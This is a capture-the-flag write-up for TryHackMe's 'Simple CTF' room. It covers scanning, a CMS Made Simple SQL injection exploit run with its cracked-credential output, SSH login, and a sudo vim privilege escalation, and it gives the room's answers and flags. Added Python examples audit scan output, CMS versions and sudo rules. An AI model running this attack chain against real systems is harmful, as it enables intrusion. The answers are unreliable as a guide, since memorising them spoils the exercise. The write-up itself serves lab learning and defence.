TryHackMe — Simple CTF
Beginner-level CTF

Description
The Simple CTF is an entry-level CTF that demonstrates most of the skills required for all CTFs, including enumeration, research, exploitation and privilege escalation.
Recon
First step: use nmap to find out what is running on the box:
nmap -sV -sS -sC -n [IP]

1. How many services are running under port 1000?
ANSWER: 2
2. What is running on the higher port?
ANSWER: ssh
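The two nmap questions above are answered by reading the scan output by eye; for more than one host that gets tedious, so here is an added example (not part of the original write-up) that parses nmap's grepable output (`-oG`) and answers both questions programmatically. The sample scan text is constructed for this example: the host address, port numbers and banners are illustrative and are not taken from the room.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in nmap's grepable (-oG) format. It is not output from
# the room; the host, port numbers and banners are illustrative only.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated as: nmap -sV -sS -sC -n -oG scan.gnmap 10.10.10.10\n"
    "Host: 10.10.10.10 ()\tStatus: Up\n"
    "Host: 10.10.10.10 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 3.0.3/, "
    "80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, "
    "2222/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)/"
    "\tIgnored State: closed (997)\n"
    "# Nmap done\n"
)


@dataclass
class Port:
    number: int
    state: str
    proto: str
    service: str
    version: str


# One port entry in the Ports: field: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_gnmap(text: str) -> Dict[str, List[Port]]:
    """Return {host: [Port, ...]} from grepable nmap output."""
    hosts: Dict[str, List[Port]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports: field ends at the next tab-separated field (Ignored State: ...).
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for num, state, proto, _owner, svc, _rpc, ver in PORT_RE.findall(ports_field):
            hosts.setdefault(host, []).append(Port(int(num), state, proto, svc, ver))
    return hosts


def open_ports(ports: List[Port]) -> List[Port]:
    return [p for p in ports if p.state == "open"]


def count_below(ports: List[Port], limit: int = 1000) -> int:
    """Answer to "how many services are running under port <limit>?"."""
    return sum(1 for p in open_ports(ports) if p.number < limit)


def highest_port_service(ports: List[Port]) -> Optional[str]:
    """Service name on the highest open port, or None if nothing is open."""
    opened = open_ports(ports)
    return max(opened, key=lambda p: p.number).service if opened else None


if __name__ == "__main__":
    for host, ports in parse_gnmap(SAMPLE_GNMAP).items():
        print(host, "open below 1000:", count_below(ports),
              "| highest-port service:", highest_port_service(ports))
```

Run a real scan with `-oG scan.gnmap` and feed the file contents to `parse_gnmap` instead of the constructed sample; only ports in state `open` are counted, so filtered or closed ports reported by nmap do not inflate the answer.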
Next, we can use “gobuster” to scan the website for any additional pages.
gobuster dir -u http://[IP] -w /usr/share/wordlists/dirb/common.txt -t 50

http://[IP]/simple does, however, give us something useful: it's a CMS.

At the bottom of the site the version number is shown: this CMS is running version 2.2.8.
A search on ExploitDB shows that this version is affected by a SQL injection vulnerability with a public exploit available.
More info can be found here: CMS Made Simple < 2.2.10 - SQL Injection
Or use searchsploit:
searchsploit CMS Made Simple 2.2.8

- What’s the CVE you’re using against the application?
CVE-2019-9053
- To what kind of vulnerability is the application vulnerable?
sqli
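The advisory referenced above, "CMS Made Simple < 2.2.10 - SQL Injection" (CVE-2019-9053), is a version-range check, and this is exactly the check a defender runs across an inventory of installs. The following is an added example, not code from the write-up or from the exploit: it pulls the version string out of a footer, compares it to the fixed version as numeric tuples, and shows why a plain string comparison gets "2.2.8" vs "2.2.10" wrong. The footer HTML is constructed for the example; the page only states that the version number is shown at the bottom of the site.

```python
import re
from typing import List, Optional, Tuple

# Constructed footer text; the page only states that the version appears at the bottom.
FOOTER_HTML = (
    '<p>This site is powered by '
    '<a href="http://www.cmsmadesimple.org">CMS Made Simple</a> version 2.2.8</p>'
)

# Advisory data as stated on the page: affected below 2.2.10, CVE-2019-9053, SQL injection.
ADVISORIES = [
    {"id": "CVE-2019-9053", "product": "CMS Made Simple",
     "fixed_in": "2.2.10", "kind": "SQL injection"},
]

VERSION_RE = re.compile(r"CMS Made Simple.*?version\s+(\d+(?:\.\d+)*)", re.I | re.S)


def parse_version(s: str) -> Tuple[int, ...]:
    """'2.2.8' -> (2, 2, 8): tuples compare component-wise, strings do not."""
    return tuple(int(x) for x in s.split("."))


def extract_version(html: str) -> Optional[str]:
    """Return the version string from a CMS footer, or None if absent."""
    m = VERSION_RE.search(html)
    return m.group(1) if m else None


def affected_by(version: str, advisories=ADVISORIES) -> List[str]:
    """IDs of advisories whose fixed version is above the running version."""
    running = parse_version(version)
    return [a["id"] for a in advisories if running < parse_version(a["fixed_in"])]


def naive_string_compare(version: str, fixed: str) -> bool:
    """The pitfall: lexicographic order says '2.2.8' is NOT below '2.2.10'."""
    return version < fixed


if __name__ == "__main__":
    ver = extract_version(FOOTER_HTML)
    print("detected version:", ver)
    print("affected by:", affected_by(ver) if ver else "unknown")
    print("naive string compare says below 2.2.10:", naive_string_compare(ver, "2.2.10"))
```

The point of the example is the comparison, not the regex: any version check that compares strings (`"2.2.8" < "2.2.10"` is false in Python) reports a vulnerable 2.2.8 install as patched, which is the kind of false negative that leaves this SQL injection in place.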
Run the exploit:
python2 46635.py -u http://[IP]/simple/ --crack -w 10k-most-common.txt

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
5. What’s the password?
secret
Gain Access

- Where can you login with the details obtained?
ssh
- What’s the user flag?
G00d j0b, keep up!
- Is there any other user in the home directory? What’s its name?
sunbath
Privilege escalation
Now, to get the root flag, let’s first check what this user is allowed to run as sudo using “sudo -l”.

vim can be run with sudo and without a password. Now use your favourite resource, such as GTFOBins: https://gtfobins.github.io/gtfobins/vim/
- What can you leverage to spawn a privileged shell?
vim
- What’s the root flag?
W3ll d0n3. You made it!
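The “sudo -l” finding above (vim runnable as root with NOPASSWD) is the kind of misconfiguration an administrator should catch before a CTF-style attacker does. Here is an added example, not part of the original write-up, that parses “sudo -l” output and flags rules that need no password or grant an editor that can spawn a shell, which is the property GTFOBins documents for vim. The sudo output is constructed for the example (the user name mitch and host name are placeholders), and the shell-capable watch-list is an assumption limited to the page’s own instance, vim; extend it from GTFOBins for real audits.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed "sudo -l" output reflecting what the room describes (vim as root,
# NOPASSWD). The user, host name and second rule are placeholders.
SUDO_L_OUTPUT = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (ALL) /usr/bin/systemctl restart nginx
"""

# Assumption: a short watch-list of editors that GTFOBins documents as able to
# spawn a shell. The page covers vim only; extend this from GTFOBins for real use.
SHELL_CAPABLE = {"vim", "vi", "vim.basic"}

# One rule line: "(runas) TAG: TAG: command, command"
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


@dataclass
class SudoRule:
    runas: str
    tags: List[str]
    commands: List[str]


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Parse the command rules listed after 'may run the following commands'."""
    rules: List[SudoRule] = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, tag_str, cmd_str = m.groups()
        tags = [t.rstrip(":") for t in tag_str.split()]
        commands = [c.strip() for c in cmd_str.split(",")]
        rules.append(SudoRule(runas.strip(), tags, commands))
    return rules


def audit(rules: List[SudoRule]) -> List[Dict]:
    """Flag rules that run as root/ALL and either skip the password,
    grant every command, or grant a shell-capable editor."""
    findings = []
    for rule in rules:
        if rule.runas not in ("root", "ALL"):
            continue
        for cmd in rule.commands:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            reasons = []
            if cmd == "ALL":
                reasons.append("unrestricted command")
            if "NOPASSWD" in rule.tags:
                reasons.append("no password required")
            if binary in SHELL_CAPABLE:
                reasons.append(f"{binary} can spawn a shell (see GTFOBins)")
            if reasons:
                severity = "high" if cmd == "ALL" or binary in SHELL_CAPABLE else "medium"
                findings.append({"command": cmd, "runas": rule.runas,
                                 "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f["severity"].upper(), f["command"], "as", f["runas"], "-", "; ".join(f["reasons"]))
```

On a real host, run it as `sudo -l | python3 audit_sudo.py` with `sys.stdin.read()` in place of the constructed sample. The mitigation for the flagged rule is the usual one: if a user genuinely needs to edit files as root, grant `sudoedit` on the specific paths rather than an unrestricted editor, and drop NOPASSWD.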
Thank you for reading
Room Link: